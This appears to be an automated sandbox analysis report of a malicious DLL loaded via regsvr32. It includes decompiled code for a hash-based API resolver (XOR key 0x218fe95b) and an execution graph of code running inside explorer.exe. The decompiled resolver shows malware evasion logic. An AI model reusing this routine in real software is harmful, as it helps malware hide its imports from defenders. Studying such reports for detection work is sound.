        Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40);
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























        0x1000dfb6
        0x1000dfb8
        0x1000dfbb
        0x1000dfbe
        0x1000dfc4
        0x1000e021
        0x00000000
        0x1000e021
        0x1000dfc6
        0x1000dfd1
        0x1000dfd4
        0x1000dfd9
        0x1000dfde
        0x1000dfe1
        0x1000dfe3
        0x1000dfe6
        0x1000dfe9
        0x1000dfee
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x1000dff0
        0x1000dff0
        0x1000e002
        0x1000e00f
        0x1000e013
        0x00000000
        0x00000000
        0x1000e015
        0x1000e018
        0x1000e019
        0x1000e01f
        0x00000000
        0x00000000
        0x00000000
        0x1000e01f
        0x1000e036
        0x1000e03b
        0x1000e03f
        0x00000000
        0x1000e04b
        0x1000e04b
        0x1000e04d
        0x1000e04d
        0x1000e053
        0x00000000
        0x00000000
        0x1000e059
        0x1000e05d
        0x1000e061
        0x00000000
        0x00000000
        0x00000000
        0x1000e061
        0x1000e067
        0x1000e06f
        0x1000e074
        0x1000e077
        0x1000e077
        0x1000e079
        0x1000e07d
        0x1000e085
        0x00000000
        0x00000000
        0x1000e089
        0x1000e091
        0x00000000
        0x00000000
        0x00000000
        0x1000e091

        APIs
        • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
        • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: .dll
        • API String ID: 2574300362-2738580789
        • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
        • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
        • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
        • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
        Uniqueness

        Uniqueness Score: -1.00%

        Analysis Process: explorer.exe PID: 2520 Parent PID: 1760 explorer.exeCOMMON

        Execution Graph

        Execution Coverage:14.2%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0.6%
        Total number of Nodes:2000
        Total number of Limit Nodes:41

        Graph

        execution_graph 11806 c540e 11811 cd603 11806->11811 11809 c542c 11810 c5423 GetLastError 11810->11809 11836 c8604 RtlAllocateHeap 11811->11836 11813 cd61d 11814 c91e3 RtlAllocateHeap 11813->11814 11834 c541f 11813->11834 11815 cd632 11814->11815 11815->11834 11837 cc3a7 11815->11837 11818 c95e1 RtlAllocateHeap 11819 cd652 11818->11819 11820 c9640 2 API calls 11819->11820 11821 cd667 11820->11821 11822 c85d5 2 API calls 11821->11822 11823 cd670 11822->11823 11843 cd44b 11823->11843 11827 c861a 2 API calls 11828 cd720 11827->11828 11829 c861a 2 API calls 11828->11829 11830 cd72b 11829->11830 11832 c861a 2 API calls 11830->11832 11831 cd692 11835 cd683 11831->11835 11865 ca63b CreateFileW 11831->11865 11832->11834 11834->11809 11834->11810 11835->11827 11836->11813 11838 cc3c0 11837->11838 11839 c8698 3 API calls 11838->11839 11841 cc43b 11838->11841 11842 cc4c0 11838->11842 11839->11841 11840 c874f memset 11840->11842 11841->11840 11841->11842 11842->11818 11844 c95e1 RtlAllocateHeap 11843->11844 11845 cd45a 11844->11845 11866 c950e 11845->11866 11848 c85d5 2 API calls 11849 cd46f 11848->11849 11850 ca77d 3 API calls 11849->11850 11851 cd486 11849->11851 11850->11851 11851->11835 11852 cd497 11851->11852 11853 c92e5 2 API calls 11852->11853 11854 cd4b0 CoInitializeEx 11853->11854 11855 c95e1 RtlAllocateHeap 11854->11855 11856 cd4cb 11855->11856 11857 c95e1 RtlAllocateHeap 11856->11857 11858 cd4dc 11857->11858 11859 c85d5 2 API calls 11858->11859 11860 cd4f8 11859->11860 11861 c85d5 2 API calls 11860->11861 11862 cd50e 11861->11862 11863 c861a 2 API calls 11862->11863 11864 cd519 11863->11864 11864->11831 11865->11831 11867 c902d _ftol2_sse 11866->11867 11868 c9531 11867->11868 11869 c92e5 2 API calls 11868->11869 11870 c9552 11869->11870 11870->11848 11886 c3506 11887 d249b 2 API calls 11886->11887 11888 c3524 11887->11888 11907 c85ef HeapCreate 11888->11907 11890 c352a 11891 c8f78 RtlAllocateHeap 11890->11891 11892 c352f 11891->11892 11893 c5eb6 7 API calls 11892->11893 11894 c353a 11893->11894 11895 ccf84 12 API calls 11894->11895 11896 c3545 11895->11896 11908 c8604 RtlAllocateHeap 11896->11908 11898 c3567 11899 c3581 lstrcpynW 11898->11899 11906 c3571 11898->11906 11900 c359a 11899->11900 11909 d2662 11900->11909 11903 c9601 2 API calls 11904 c360e GetLastError 11903->11904 11904->11906 11907->11890 11908->11898 11914 d26b3 11909->11914 11912 c35b8 11912->11903 11912->11906 11915 d2678 11914->11915 11916 d2709 11914->11916 11915->11912 11920 d2aec 11915->11920 11916->11915 11919 d27a4 11916->11919 11927 c8604 RtlAllocateHeap 11916->11927 11918 c874f memset 11918->11919 11919->11915 11919->11918 11922 d2b16 11920->11922 11921 d2c42 GetModuleHandleA 11921->11922 11923 d2c5b LoadLibraryA 11921->11923 11922->11921 11924 d2c74 11922->11924 11925 d2ccc GetProcAddress 11922->11925 11926 d2cb3 GetProcAddress 11922->11926 11923->11922 11924->11912 11925->11922 11926->11922 11927->11919 12130 c131e 12131 c9ea5 7 API calls 12130->12131 12132 c1335 12131->12132 12133 c9e1f 7 API calls 12132->12133 12134 c1341 12133->12134 12135 c1366 12134->12135 12136 d242d _ftol2_sse 12134->12136 12170 c11e7 12135->12170 12136->12135 12139 c139b 12140 c9ed0 7 API calls 12141 c13b1 12140->12141 12142 c147c 12141->12142 12177 c763f 12141->12177 12144 ca4ef 4 API calls 12142->12144 12146 c1493 12144->12146 12147 ca5c6 8 API calls 12146->12147 12149 c149f 12147->12149 12148 c1412 12152 ca4ef 4 API calls 12148->12152 12373 c748a 12149->12373 12150 c9ed0 7 API calls 12153 c1409 12150->12153 12155 c142e 12152->12155 12153->12148 12200 c636a 12153->12200 12351 ca5c6 12155->12351 12156 c861a 2 API calls 12156->12139 12157 c14dd 12402 c110b lstrcmpA 12157->12402 12158 c14f3 12164 c110b 9 API calls 12158->12164 12167 c13d8 12158->12167 12165 c14e9 12164->12165 12412 c10ba 12165->12412 12167->12156 12171 c95c7 RtlAllocateHeap 12170->12171 12172 c11f8 12171->12172 12173 c9292 2 API calls 12172->12173 12174 c1214 12173->12174 12175 c85c2 2 API calls 12174->12175 12176 c1221 12175->12176 12176->12139 12176->12140 12420 cffa0 12177->12420 12179 c765a 12424 c821d 12179->12424 12181 c7670 12182 c821d strncpy 12181->12182 12183 c7684 12182->12183 12184 c821d strncpy 12183->12184 12185 c769a 12184->12185 12428 d0a21 12185->12428 12187 c76a5 12199 c13cf 12187->12199 12433 c70ea 12187->12433 12189 c76df 12191 c861a 2 API calls 12189->12191 12190 c76d8 12190->12189 12450 c7084 12190->12450 12192 c771a 12191->12192 12194 c861a 2 API calls 12192->12194 12195 c7725 12194->12195 12197 c861a 2 API calls 12195->12197 12196 c76fe 12455 c726d 12196->12455 12197->12199 12199->12148 12199->12150 12199->12167 12672 c8604 RtlAllocateHeap 12200->12672 12202 c6380 12203 c9e66 7 API calls 12202->12203 12350 c6888 12202->12350 12204 c6395 12203->12204 12673 ceb91 12204->12673 12209 c91e3 RtlAllocateHeap 12210 c63b9 12209->12210 12211 c91e3 RtlAllocateHeap 12210->12211 12212 c63cd 12211->12212 12213 c63f2 12212->12213 12214 c91e3 RtlAllocateHeap 12212->12214 12215 c91e3 RtlAllocateHeap 12213->12215 12214->12213 12216 c6417 12215->12216 12699 cd8b8 12216->12699 12222 c6486 12231 c64ab 12222->12231 12746 c8604 RtlAllocateHeap 12222->12746 12223 c109a RtlAllocateHeap 12225 c64da 12223->12225 12227 c109a RtlAllocateHeap 12225->12227 12226 c6497 12226->12231 12747 cac3f 12226->12747 12228 c64e8 12227->12228 12230 c109a RtlAllocateHeap 12228->12230 12232 c64f7 12230->12232 12231->12223 12233 c109a RtlAllocateHeap 12232->12233 12234 c6506 12233->12234 12235 c109a RtlAllocateHeap 12234->12235 12236 c6515 12235->12236 12237 c109a RtlAllocateHeap 12236->12237 12238 c6520 12237->12238 12239 c9640 2 API calls 12238->12239 12240 c6542 12239->12240 12241 c109a RtlAllocateHeap 12240->12241 12242 c654c 12241->12242 12243 c109a RtlAllocateHeap 12242->12243 12244 c655c 12243->12244 12245 c109a RtlAllocateHeap 12244->12245 12246 c656b 12245->12246 12247 c109a RtlAllocateHeap 12246->12247 12248 c657a 12247->12248 12249 c109a RtlAllocateHeap 12248->12249 12250 c658a 12249->12250 12251 c109a RtlAllocateHeap 12250->12251 12252 c659b 12251->12252 12751 ca9b7 memset CreatePipe 12252->12751 12255 ca9b7 8 API calls 12256 c65ba 12255->12256 12257 ca9b7 8 API calls 12256->12257 12258 c65cb 12257->12258 12259 ca9b7 8 API calls 12258->12259 12260 c65dc 12259->12260 12261 ca9b7 8 API calls 12260->12261 12262 c65ed 12261->12262 12263 ca9b7 8 API calls 12262->12263 12264 c6601 12263->12264 12265 ca9b7 8 API calls 12264->12265 12266 c6612 12265->12266 12267 ca9b7 8 API calls 12266->12267 12268 c6623 12267->12268 12269 ca9b7 8 API calls 12268->12269 12270 c6634 12269->12270 12271 ca9b7 8 API calls 12270->12271 12272 c6644 12271->12272 12273 ca9b7 8 API calls 12272->12273 12274 c6654 12273->12274 12275 ca9b7 8 API calls 12274->12275 12276 c6661 12275->12276 12277 c85d5 2 API calls 12276->12277 12278 c6670 12277->12278 12279 c85d5 2 API calls 12278->12279 12280 c667a 12279->12280 12281 c85d5 2 API calls 12280->12281 12282 c6684 12281->12282 12283 c85d5 2 API calls 12282->12283 12284 c668e 12283->12284 12285 c85d5 2 API calls 12284->12285 12286 c6698 12285->12286 12287 c85d5 2 API calls 12286->12287 12288 c66a2 12287->12288 12289 c85d5 2 API calls 12288->12289 12290 c66ac 12289->12290 12350->12148 12352 c9e1f 7 API calls 12351->12352 12353 ca5d8 12352->12353 12354 c980c GetSystemTimeAsFileTime 12353->12354 12355 c143a 12354->12355 12356 c773a 12355->12356 12852 cf23f 12356->12852 12358 c775a 12855 c7b14 12358->12855 13017 c90c1 12373->13017 12376 cf23f GetTickCount 12377 c74d1 12376->12377 13023 c78e0 12377->13023 12379 c14d1 12379->12157 12379->12158 12380 c74f1 12380->12379 12381 c70ea 20 API calls 12380->12381 12382 c7521 12381->12382 12386 c7084 6 API calls 12382->12386 12401 c7528 12382->12401 12383 c861a 2 API calls 12384 c761f 12383->12384 12385 c861a 2 API calls 12384->12385 12388 c762a 12385->12388 12387 c7552 12386->12387 12387->12401 13062 c7302 12387->13062 12389 c861a 2 API calls 12388->12389 12389->12379 12391 c7580 12391->12401 13075 c71b1 12391->13075 12395 c75cd 13096 c7a5d 12395->13096 12397 c75e0 12398 c70ea 20 API calls 12397->12398 12399 c75fe 12398->12399 12400 c861a 2 API calls 12399->12400 12400->12401 12401->12383 12403 c112e 12402->12403 12404 c96ca memset 12403->12404 12411 c1185 12403->12411 12405 c114d 12404->12405 12406 c980c GetSystemTimeAsFileTime 12405->12406 12407 c1162 12406->12407 12408 c9f48 6 API calls 12407->12408 12409 c1176 12408->12409 12410 c9f06 6 API calls 12409->12410 12410->12411 12411->12165 12413 c10da 12412->12413 12414 c10c6 12412->12414 12416 c9e66 7 API calls 12413->12416 12415 c9e66 7 API calls 12414->12415 12417 c10cd 12415->12417 12416->12417 12418 c9601 2 API calls 12417->12418 12419 c10fe 12418->12419 12419->12167 12421 cffa8 12420->12421 12423 cffaf 12421->12423 12458 d1648 12421->12458 12423->12179 12425 c8233 12424->12425 12427 c822e 12424->12427 12471 d0080 12425->12471 12427->12181 12429 d0a30 12428->12429 12430 d0a35 12429->12430 12483 d09c5 12429->12483 12430->12187 12432 d0a4e 12432->12187 12533 c6fee 12433->12533 12435 c710e 12448 c7195 12435->12448 12540 cb462 12435->12540 12437 c7124 12441 c7159 12437->12441 12543 c6f09 12437->12543 12438 c861a 2 API calls 12440 c7175 12438->12440 12442 c861a 2 API calls 12440->12442 12441->12438 12444 c7180 12442->12444 12443 c7132 12443->12441 12551 ce9d4 12443->12551 12445 c861a 2 API calls 12444->12445 12447 c718b 12445->12447 12447->12448 12449 c861a 2 API calls 12447->12449 12448->12190 12449->12448 12451 cb4a3 2 API calls 12450->12451 12452 c709c 12451->12452 12453 c6f67 5 API calls 12452->12453 12454 c70bb 12452->12454 12453->12454 12454->12196 12615 d0b0e 12455->12615 12457 c7286 12457->12189 12459 d1659 12458->12459 12460 d1694 12458->12460 12461 d166a 12459->12461 12462 d16a7 SwitchToThread 12459->12462 12460->12423 12461->12460 12466 d16b8 GetModuleHandleA 12461->12466 12462->12460 12462->12462 12464 d1677 12464->12460 12465 d167c _time64 GetCurrentProcessId 12464->12465 12465->12460 12467 d16d7 GetProcAddress 12466->12467 12470 d1709 12466->12470 12468 d16ec GetProcAddress 12467->12468 12467->12470 12469 d16fb GetProcAddress 12468->12469 12468->12470 12469->12470 12470->12464 12470->12470 12472 d00b2 12471->12472 12473 d008b 12471->12473 12472->12427 12473->12472 12475 d00c6 12473->12475 12476 d00f4 12475->12476 12477 d00d1 12475->12477 12476->12472 12477->12476 12479 d1c4a 12477->12479 12480 d1c62 12479->12480 12481 d1ce9 strncpy 12480->12481 12482 d1cb5 12480->12482 12481->12482 12482->12476 12484 d09d8 12483->12484 12486 d09f4 12484->12486 12487 d02b2 12484->12487 12486->12432 12488 d02e0 12487->12488 12509 d02f2 12487->12509 12489 d039d 12488->12489 12490 d031c 12488->12490 12491 d034c 12488->12491 12492 d04b0 12488->12492 12497 d037c 12488->12497 12488->12509 12528 d0a7b _snprintf 12489->12528 12494 d0322 _snprintf 12490->12494 12511 d2122 12491->12511 12495 d0a7b 2 API calls 12492->12495 12494->12509 12499 d04df 12495->12499 12523 d07f7 12497->12523 12502 d0561 12499->12502 12507 d0697 12499->12507 12499->12509 12500 d03ac 12501 d02b2 10 API calls 12500->12501 12500->12509 12501->12500 12504 d05a2 qsort 12502->12504 12502->12509 12503 d07f7 2 API calls 12503->12507 12504->12509 12510 d05cb 12504->12510 12505 d02b2 10 API calls 12505->12507 12506 d07f7 2 API calls 12506->12510 12507->12503 12507->12505 12507->12509 12508 d02b2 10 API calls 12508->12510 12509->12486 12509->12509 12510->12506 12510->12508 12510->12509 12512 d212c 12511->12512 12513 d212f _snprintf 12511->12513 12512->12513 12514 d21c6 12513->12514 12515 d2158 12513->12515 12514->12509 12515->12514 12516 d2161 localeconv 12515->12516 12517 d216e strchr 12516->12517 12518 d2181 strchr 12516->12518 12517->12518 12519 d217e 12517->12519 12520 d218f strchr 12518->12520 12521 d21b3 strchr 12518->12521 12519->12518 12520->12521 12522 d219d 12520->12522 12521->12514 12522->12514 12522->12521 12525 d080d 12523->12525 12524 d0995 12524->12509 12525->12524 12526 d0927 _snprintf 12525->12526 12527 d0910 _snprintf 12525->12527 12526->12525 12527->12525 12529 d0a9c 12528->12529 12530 d0aa3 12529->12530 12531 d1c4a strncpy 12529->12531 12530->12500 12532 d0ab9 12531->12532 12532->12500 12555 c8604 RtlAllocateHeap 12533->12555 12535 c7008 12536 d22d3 _ftol2_sse 12535->12536 12539 c703d 12535->12539 12537 c7028 12536->12537 12556 c6f67 12537->12556 12539->12435 12565 c8604 RtlAllocateHeap 12540->12565 12542 cb487 12542->12437 12544 c6f1a 12543->12544 12545 c902d _ftol2_sse 12544->12545 12546 c6f38 12545->12546 12566 c8604 RtlAllocateHeap 12546->12566 12548 c6f43 12549 c6f5d 12548->12549 12550 c9601 2 API calls 12548->12550 12549->12443 12550->12549 12552 ce9e8 12551->12552 12554 cea2e 12552->12554 12567 cea35 12552->12567 12554->12441 12555->12535 12557 c6f80 12556->12557 12558 c1080 RtlAllocateHeap 12557->12558 12559 c6f8d lstrcpynA 12558->12559 12560 c6fab 12559->12560 12561 c85c2 2 API calls 12560->12561 12562 c6fb5 12561->12562 12563 c6fc7 memset 12562->12563 12564 c6fe8 12563->12564 12564->12539 12565->12542 12566->12548 12572 ce668 memset memset 12567->12572 12570 cea84 12570->12552 12573 c95c7 RtlAllocateHeap 12572->12573 12574 ce6bd 12573->12574 12575 c95c7 RtlAllocateHeap 12574->12575 12576 ce6ca 12575->12576 12577 c95c7 RtlAllocateHeap 12576->12577 12578 ce6d7 12577->12578 12579 c95c7 RtlAllocateHeap 12578->12579 12580 ce6e4 12579->12580 12581 c95c7 RtlAllocateHeap 12580->12581 12582 ce6f1 memset 12581->12582 12595 ce743 12582->12595 12583 ce785 GetLastError 12583->12595 12584 ce93e 12585 ce752 12584->12585 12586 ce97c 12584->12586 12587 ce971 GetLastError 12584->12587 12585->12570 12597 ce4fa 12585->12597 12588 c9749 2 API calls 12586->12588 12587->12585 12588->12585 12589 ce81c GetLastError 12589->12595 12590 c980c GetSystemTimeAsFileTime 12590->12595 12591 ce86b GetLastError 12591->12595 12592 c95c7 RtlAllocateHeap 12592->12595 12593 ce8b4 GetLastError 12593->12595 12594 c85c2 2 API calls 12594->12595 12595->12583 12595->12584 12595->12585 12595->12589 12595->12590 12595->12591 12595->12592 12595->12593 12595->12594 12596 ce903 GetLastError 12595->12596 12596->12595 12598 ce539 12597->12598 12613 c8604 RtlAllocateHeap 12598->12613 12600 ce552 12601 ce55b 12600->12601 12614 c8604 RtlAllocateHeap 12600->12614 12603 ce62e 12601->12603 12604 c861a 2 API calls 12601->12604 12605 ce646 12603->12605 12606 c861a 2 API calls 12603->12606 12604->12603 12605->12570 12606->12605 12607 ce608 GetLastError 12607->12601 12608 ce614 12607->12608 12610 c980c GetSystemTimeAsFileTime 12608->12610 12609 c980c GetSystemTimeAsFileTime 12611 ce56b 12609->12611 12610->12601 12611->12601 12611->12603 12611->12607 12611->12609 12612 c8698 3 API calls 12611->12612 12612->12611 12613->12600 12614->12611 12616 d0b61 12615->12616 12617 d0b1b 12615->12617 12616->12457 12617->12616 12620 d122a 12617->12620 12619 d0b4e 12619->12457 12627 d0c21 12620->12627 12622 d1241 12626 d1268 12622->12626 12631 d139e 12622->12631 12624 d125f 12625 d0c21 8 API calls 12624->12625 12624->12626 12625->12626 12626->12619 12628 d0c33 12627->12628 12630 d0c6c 12628->12630 12641 d0dfa 12628->12641 12630->12622 12632 d13b5 12631->12632 12633 d13ff 12631->12633 12632->12633 12634 d1425 12632->12634 12635 d13d1 12632->12635 12633->12624 12665 d11aa 12634->12665 12636 d1414 12635->12636 12637 d13d6 12635->12637 12655 d129b 12636->12655 12637->12633 12640 d13e7 memchr 12637->12640 12640->12633 12642 d0e14 12641->12642 12643 d0ec8 12642->12643 12645 d0e7d 12642->12645 12647 d0e36 12642->12647 12643->12647 12648 d21ff localeconv 12643->12648 12646 d0e8d _errno _strtoi64 _errno 12645->12646 12646->12647 12647->12630 12649 d2229 _errno strtod 12648->12649 12650 d2216 strchr 12648->12650 12652 d2253 12649->12652 12653 d2262 _errno 12649->12653 12650->12649 12651 d2225 12650->12651 12651->12649 12652->12653 12654 d226e 12652->12654 12653->12654 12654->12647 12656 cffa0 7 API calls 12655->12656 12657 d12a7 12656->12657 12658 d0c21 8 API calls 12657->12658 12664 d12ca 12657->12664 12662 d12be 12658->12662 12659 d12ea memchr 12659->12662 12659->12664 12660 d139e 17 API calls 12660->12662 12661 d00c6 strncpy 12661->12662 12662->12659 12662->12660 12662->12661 12663 d0c21 8 API calls 12662->12663 12662->12664 12663->12662 12664->12633 12666 d11b3 12665->12666 12667 d0c21 8 API calls 12666->12667 12669 d11ce 12666->12669 12670 d11c6 12667->12670 12668 d139e 18 API calls 12668->12670 12669->12633 12670->12668 12670->12669 12671 d0c21 8 API calls 12670->12671 12671->12670 12672->12202 12674 c9601 2 API calls 12673->12674 12675 c63a0 12674->12675 12676 cd804 12675->12676 12677 c95e1 RtlAllocateHeap 12676->12677 12678 cd819 12677->12678 12823 cd523 CoInitializeEx CoInitializeSecurity CoCreateInstance 12678->12823 12681 c85d5 2 API calls 12682 cd831 12681->12682 12683 c63a5 12682->12683 12684 c95e1 RtlAllocateHeap 12682->12684 12683->12209 12685 cd845 12684->12685 12686 c95e1 RtlAllocateHeap 12685->12686 12687 cd856 12686->12687 12830 cd748 SysAllocString SysAllocString 12687->12830 12689 cd867 12690 cd895 12689->12690 12692 c91e3 RtlAllocateHeap 12689->12692 12691 c85d5 2 API calls 12690->12691 12693 cd89e 12691->12693 12694 cd876 VariantClear 12692->12694 12695 c85d5 2 API calls 12693->12695 12694->12690 12697 cd8a7 12695->12697 12836 cd5d7 12697->12836 12700 c95e1 RtlAllocateHeap 12699->12700 12701 cd8cd 12700->12701 12702 cd523 6 API calls 12701->12702 12703 cd8d7 12702->12703 12704 c85d5 2 API calls 12703->12704 12705 cd8e5 12704->12705 12706 c95e1 RtlAllocateHeap 12705->12706 12721 c6459 12705->12721 12707 cd8f9 12706->12707 12708 c95e1 RtlAllocateHeap 12707->12708 12709 cd90a 12708->12709 12710 cd748 9 API calls 12709->12710 12711 cd91b 12710->12711 12712 cd949 12711->12712 12714 c91e3 RtlAllocateHeap 12711->12714 12713 c85d5 2 API calls 12712->12713 12715 cd952 12713->12715 12716 cd92a VariantClear 12714->12716 12717 c85d5 2 API calls 12715->12717 12716->12712 12719 cd95b 12717->12719 12720 cd5d7 2 API calls 12719->12720 12720->12721 12722 cd96c 12721->12722 12723 c95e1 RtlAllocateHeap 12722->12723 12724 cd981 12723->12724 12725 cd523 6 API calls 12724->12725 12726 cd98b 12725->12726 12727 c85d5 2 API calls 12726->12727 12728 cd999 12727->12728 12729 c6461 12728->12729 12730 c95e1 RtlAllocateHeap 12728->12730 12745 c8604 RtlAllocateHeap 12729->12745 12731 cd9ad 12730->12731 12732 c95e1 RtlAllocateHeap 12731->12732 12733 cd9be 12732->12733 12734 cd748 9 API calls 12733->12734 12735 cd9cf 12734->12735 12736 cd9fd 12735->12736 12738 c91e3 RtlAllocateHeap 12735->12738 12737 c85d5 2 API calls 12736->12737 12739 cda06 12737->12739 12740 cd9de VariantClear 12738->12740 12741 c85d5 2 API calls 12739->12741 12740->12736 12743 cda0f 12741->12743 12744 cd5d7 2 API calls 12743->12744 12744->12729 12745->12222 12746->12226 12748 cac5b 12747->12748 12749 cac64 memset 12748->12749 12750 cac92 12748->12750 12749->12750 12750->12231 12752 caa22 CreatePipe 12751->12752 12766 c65a9 12751->12766 12753 caa39 12752->12753 12761 cab52 12752->12761 12841 c8604 RtlAllocateHeap 12753->12841 12755 c861a 2 API calls 12755->12766 12756 c9292 2 API calls 12758 caa69 12756->12758 12757 c91a6 RtlAllocateHeap 12757->12758 12758->12756 12758->12757 12759 c861a 2 API calls 12758->12759 12760 cab18 12758->12760 12758->12761 12758->12766 12759->12758 12760->12761 12762 c9256 2 API calls 12760->12762 12761->12755 12763 cab3b 12762->12763 12763->12761 12764 cab41 12763->12764 12765 c861a 2 API calls 12764->12765 12765->12766 12766->12255 12824 cd568 SysAllocString 12823->12824 12826 cd5a5 12823->12826 12825 cd583 12824->12825 12825->12826 12827 cd587 CoSetProxyBlanket 12825->12827 12826->12681 12827->12826 12828 cd59e 12827->12828 12840 c8604 RtlAllocateHeap 12828->12840 12831 c95e1 RtlAllocateHeap 12830->12831 12832 cd773 SysAllocString 12831->12832 12833 c85d5 2 API calls 12832->12833 12835 cd786 SysFreeString SysFreeString SysFreeString 12833->12835 12835->12689 12837 cd5e2 12836->12837 12838 c861a 2 API calls 12837->12838 12839 cd5ff 12838->12839 12839->12683 12840->12826 12841->12758 12853 cf25f GetTickCount 12852->12853 12854 cf24e __aulldiv 12852->12854 12853->12358 12854->12358 12856 cffa0 7 API calls 12855->12856 12857 c7b24 12856->12857 12858 c821d strncpy 12857->12858 12859 c7b3d 12858->12859 12860 c821d strncpy 12859->12860 12861 c7b51 12860->12861 12862 c821d strncpy 12861->12862 12863 c7b62 12862->12863 12864 c821d strncpy 12863->12864 12865 c7b73 12864->12865 12866 c821d strncpy 12865->12866 12867 c7b89 12866->12867 12868 c821d strncpy 12867->12868 12869 c7b9d 12868->12869 12870 c821d strncpy 12869->12870 12871 c7bb6 12870->12871 12872 c821d strncpy 12871->12872 12873 c7bca 12872->12873 12874 c821d strncpy 12873->12874 12875 c7bde 12874->12875 12876 c821d strncpy 12875->12876 12877 c7bf2 12876->12877 12878 c821d strncpy 12877->12878 12879 c7c08 12878->12879 12880 c821d strncpy 12879->12880 12881 c7c1f 12880->12881 13005 c8279 12881->13005 12884 c821d strncpy 12885 c7c32 12884->12885 12886 c821d strncpy 12885->12886 12887 c7c46 12886->12887 12888 c821d strncpy 12887->12888 12889 c7c5a 12888->12889 12890 c8279 5 API calls 12889->12890 12891 c7c62 12890->12891 12892 c821d strncpy 12891->12892 12893 c7c6d 12892->12893 12894 c8279 5 API calls 12893->12894 12895 c7c75 12894->12895 12896 c821d strncpy 12895->12896 12897 c7c80 12896->12897 12898 c8279 5 API calls 12897->12898 12899 c7c88 12898->12899 12900 c821d strncpy 12899->12900 12901 c7c93 12900->12901 12902 c821d strncpy 12901->12902 12903 c7ca7 12902->12903 12904 c8279 5 API calls 12903->12904 12905 c7caf 12904->12905 12906 c821d strncpy 12905->12906 12907 c7cba 12906->12907 12908 c821d strncpy 12907->12908 12909 c7cd4 12908->12909 12910 c8279 5 API calls 12909->12910 12911 c7cdc 12910->12911 12912 c821d strncpy 12911->12912 12913 c7ce7 12912->12913 12914 c821d strncpy 12913->12914 12915 c7cfb 12914->12915 12916 c821d strncpy 12915->12916 12917 c7d0f 12916->12917 12918 c8279 5 API calls 12917->12918 12919 c7d20 12918->12919 12920 c821d strncpy 12919->12920 12921 c7d2b 12920->12921 12922 c821d strncpy 12921->12922 12923 c7d3f 12922->12923 12924 c821d strncpy 12923->12924 12925 c7d53 12924->12925 12926 c8279 5 API calls 12925->12926 12927 c7d5e 12926->12927 12928 c821d strncpy 12927->12928 12929 c7d69 12928->12929 12930 c8279 5 API calls 12929->12930 12931 c7d77 12930->12931 12932 c821d strncpy 12931->12932 12933 c7d82 12932->12933 12934 c8279 5 API calls 12933->12934 12935 c7d8d 12934->12935 12936 c821d strncpy 12935->12936 12937 